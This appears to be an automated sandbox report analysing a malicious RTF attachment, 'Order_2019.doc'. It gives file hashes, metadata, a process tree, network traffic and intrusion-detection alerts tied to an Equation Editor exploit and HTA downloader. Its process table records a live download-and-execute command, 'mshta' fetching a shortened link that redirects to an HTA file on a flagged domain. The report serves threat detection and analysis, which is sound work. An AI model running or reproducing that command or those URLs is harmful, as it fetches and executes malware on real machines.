File name: | Order_2019.doc |
Full analysis: | https://app.any.run/tasks/03d7d4ff-63b3-42a9-ae21-cd1c5d27fbf6 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 16:02:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 22EBD840CF4B8C030E7E6168273D84C6 |
SHA1: | 2B85F1AD5C9755395926EF9944E0F0EEC6B3763D |
SHA256: | 8A17AFC5FCBE7A062907204ECDF5B7D01F1D43ECC5ACCAEB67FC2E095034E461 |
SSDEEP: | 12288:c6mRWR66RRRRRRRm6lyEKIN25DSKHnHWH:c6mRi66RRRRRRRm6lyEKIN25DSKHnHWH |
.rtf | | | Rich Text Format (100) |
---|
Author: | Windows User |
---|---|
LastModifiedBy: | Windows User |
CreateDate: | 2019:01:11 17:48:00 |
ModifyDate: | 2019:01:11 17:49:00 |
RevisionNumber: | 1 |
TotalEditTime: | 1 minute |
Pages: | 3 |
Words: | 1179 |
Characters: | 6722 |
CharactersWithSpaces: | 7886 |
InternalVersionNumber: | 85 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3648 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Order_2019.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3024 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3704 | mshta http://bit.ly/2MaNhs9 &AAAAAAAAAAAAAAAC | C:\Windows\system32\mshta.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B4E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:AAE1C2D4D78E2C14FB6414A9B1FFAAB5 | SHA256:B7D225F520897E5D557DB320305710B84DB85F26ABE613DA8D4021E82E5226D8 | |||
3648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1BABA04707AB12BA400D13BF13DF9EB0 | SHA256:9E9340FC8C3E5353301809E9355F5D80A2A8886C35A912126785F717755A3985 | |||
3704 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt | text | |
MD5:12E7EFCAA669892E64E38525B651F93B | SHA256:1D4DC3490128EF422BA8F11401A3612154CFB99196F350878423B27906DBDAAA | |||
3648 | WINWORD.EXE | C:\Users\admin\Desktop\~$der_2019.doc.rtf | pgc | |
MD5:0EBB998861D4BF5DC51EA1D9915F8CF3 | SHA256:2A8F9AC16AA0BD297898F768F3286E983627BCA0A9134F941E9A5A6D4BF7D92B | |||
3648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Order_2019.doc.rtf.LNK | lnk | |
MD5:C05744FF05A9C967B66988C8055F96F2 | SHA256:DD780B71F5272C593F7B054734E4C38F760633141EA50AC5CC5B0BD5C44FA614 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3704 | mshta.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2MaNhs9 | US | html | 125 b | shared |
3704 | mshta.exe | GET | 404 | 94.73.146.167:80 | http://vektorex.com/cgii/kkbReport.hta | TR | html | 657 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3704 | mshta.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
3704 | mshta.exe | 94.73.146.167:80 | vektorex.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
vektorex.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3704 | mshta.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Downloader httpHeader |
3704 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - bit.ly redirect to .hta object |
3704 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - redirect to .hta object |
3704 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTA application download |
3704 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3704 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |